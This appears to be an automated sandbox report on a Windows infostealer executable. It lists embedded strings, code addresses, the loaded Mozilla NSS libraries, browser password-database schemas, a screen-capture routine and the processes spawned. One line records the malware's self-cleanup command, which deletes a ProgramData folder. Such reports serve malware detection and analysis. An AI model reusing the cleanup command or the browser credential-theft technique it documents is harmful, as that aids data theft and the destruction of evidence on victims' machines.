                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
                          Source: JDGCFB.2.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2690322571.00000000176CC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2571750793.00000000179E1000.00000004.00000020.00020000.00000000.sdmp, JDGCFB.2.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                          Source: unknown HTTPS traffic detected: 92.122.104.90:443 -> 192.168.2.4:49743 version: TLS 1.2
                          Source: unknown HTTPS traffic detected: 95.217.220.103:443 -> 192.168.2.4:49745 version: TLS 1.2
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Code function: 2_2_00411F2A CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Code function: 2_2_0040145B GetCurrentProcess,NtQueryInformationProcess
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Code function: 2_2_6CC762C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB5EF402_2_6CB5EF40
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBF68E02_2_6CBF68E0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB408202_2_6CB40820
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB7A8202_2_6CB7A820
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBC48402_2_6CBC4840
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBB09B02_2_6CBB09B0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB809A02_2_6CB809A0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBAA9A02_2_6CBAA9A0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC0C9E02_2_6CC0C9E0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB249F02_2_6CB249F0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB469002_2_6CB46900
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB289602_2_6CB28960
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB6EA802_2_6CB6EA80
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBA8A302_2_6CBA8A30
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB9EA002_2_6CB9EA00
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB6CA702_2_6CB6CA70
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB90BA02_2_6CB90BA0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBF6BE02_2_6CBF6BE0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC1A4802_2_6CC1A480
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB364D02_2_6CB364D0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB8A4D02_2_6CB8A4D0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB7A4302_2_6CB7A430
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB544202_2_6CB54420
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB084602_2_6CB08460
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CAE45B02_2_6CAE45B0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB7E5F02_2_6CB7E5F0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBBA5E02_2_6CBBA5E0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC385502_2_6CC38550
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB905702_2_6CB90570
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB525602_2_6CB52560
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB485402_2_6CB48540
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBF45402_2_6CBF4540
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB4E6E02_2_6CB4E6E0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB8E6E02_2_6CB8E6E0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB146D02_2_6CB146D0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB4C6502_2_6CB4C650
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB1A7D02_2_6CB1A7D0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB707002_2_6CB70700
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB000B02_2_6CB000B0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBCC0B02_2_6CBCC0B0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CAE80902_2_6CAE8090
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBB80102_2_6CBB8010
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBBC0002_2_6CBBC000
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB3E0702_2_6CB3E070
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CAF01E02_2_6CAF01E0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB661302_2_6CB66130
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBD41302_2_6CBD4130
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB581402_2_6CB58140
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC762C02_2_6CC762C0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBBE2B02_2_6CBBE2B0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBC22A02_2_6CBC22A0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBC82202_2_6CBC8220
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBBA2102_2_6CBBA210
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB782602_2_6CB78260
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB882502_2_6CB88250
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB4E3B02_2_6CB4E3B0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB223A02_2_6CB223A0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB443E02_2_6CB443E0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB623202_2_6CB62320
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC0C3602_2_6CC0C360
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC323702_2_6CC32370
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB863702_2_6CB86370
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CAF23702_2_6CAF2370
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CAF83402_2_6CAF8340
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC2DCD02_2_6CC2DCD0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB8FC802_2_6CB8FC80
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBB1CE02_2_6CBB1CE0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB01C302_2_6CB01C30
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC19C402_2_6CC19C40
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CAF3C402_2_6CAF3C40
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CAE3D802_2_6CAE3D80
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC39D902_2_6CC39D90
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBC1DC02_2_6CBC1DC0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB53D002_2_6CB53D00
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB13EC02_2_6CB13EC0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC75E602_2_6CC75E60
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBFDE102_2_6CBFDE10
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC4BE702_2_6CC4BE70
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC0DFC02_2_6CC0DFC0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC73FC02_2_6CC73FC0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB11F902_2_6CB11F90
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: String function: 004047E8 appears 38 times
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: String function: 6CC7DAE0 appears 56 times
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: String function: 001A72BA appears 34 times
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: String function: 6CC709D0 appears 253 times
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: String function: 0019A280 appears 100 times
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: String function: 6CB13620 appears 71 times
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: String function: 6CC29F30 appears 31 times
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: String function: 001A0E5A appears 42 times
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: String function: 004104BC appears 36 times
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: String function: 004105DE appears 71 times
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: String function: 6CC7D930 appears 45 times
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: String function: 6CB19B10 appears 72 times
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1004 -s 272
                          Source: UMrFwHyjUi.exe Static PE information: invalid certificate
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs UMrFwHyjUi.exe
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll0 vs UMrFwHyjUi.exe
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs UMrFwHyjUi.exe
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2721027676.000000006CF12000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs UMrFwHyjUi.exe
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2686404821.0000000000FB0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs UMrFwHyjUi.exe
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2705821873.0000000029F71000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs UMrFwHyjUi.exe
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs UMrFwHyjUi.exe
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2712188709.0000000035E57000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs UMrFwHyjUi.exe
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2694383485.000000001E097000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll0 vs UMrFwHyjUi.exe
                          Source: UMrFwHyjUi.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@11/24@2/2
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Code function: 2_2_6CB50300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Code function: 2_2_0041147A CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Code function: 2_2_0041196C __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z,__EH_prolog3_catch,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199786602107[1].htm
                          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
                          Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1004
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe File created: C:\Users\user\AppData\Local\Temp\delays.tmp
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Command line argument: `*" 1_2_00192F7C
                          Source: UMrFwHyjUi.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe File read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1002\desktop.ini
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2690551002.0000000017C91000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694047636.000000001DC08000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.2.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2690551002.0000000017C91000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694047636.000000001DC08000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.2.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2690551002.0000000017C91000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694047636.000000001DC08000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.2.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2690551002.0000000017C91000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694047636.000000001DC08000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.2.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2690551002.0000000017C91000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694047636.000000001DC08000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2690551002.0000000017C91000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694047636.000000001DC08000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                          Source: UMrFwHyjUi.exe, UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2690551002.0000000017C91000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694047636.000000001DC08000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.2.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2690551002.0000000017C91000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694047636.000000001DC08000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.2.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2690551002.0000000017C91000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694047636.000000001DC08000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2285331275.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, BFBFBF.2.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2690551002.0000000017C91000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694047636.000000001DC08000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2690551002.0000000017C91000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694047636.000000001DC08000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                          Source: UMrFwHyjUi.exe ReversingLabs: Detection: 65%
                          Source: unknown Process created: C:\Users\user\Desktop\UMrFwHyjUi.exe "C:\Users\user\Desktop\UMrFwHyjUi.exe"
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Process created: C:\Users\user\Desktop\UMrFwHyjUi.exe "C:\Users\user\Desktop\UMrFwHyjUi.exe"
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Process created: C:\Users\user\Desktop\UMrFwHyjUi.exe "C:\Users\user\Desktop\UMrFwHyjUi.exe"
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1004 -s 272
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DBFCBGCGIJKJ" & exit
                          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Process created: C:\Users\user\Desktop\UMrFwHyjUi.exe "C:\Users\user\Desktop\UMrFwHyjUi.exe"
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Process created: C:\Users\user\Desktop\UMrFwHyjUi.exe "C:\Users\user\Desktop\UMrFwHyjUi.exe"
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DBFCBGCGIJKJ" & exit
                          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: apphelp.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: sspicli.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: wininet.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: rstrtmgr.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: ncrypt.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: ntasn1.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: dbghelp.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: iertutil.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: windows.storage.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: wldp.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: profapi.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: kernel.appcore.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: ondemandconnroutehelper.dll
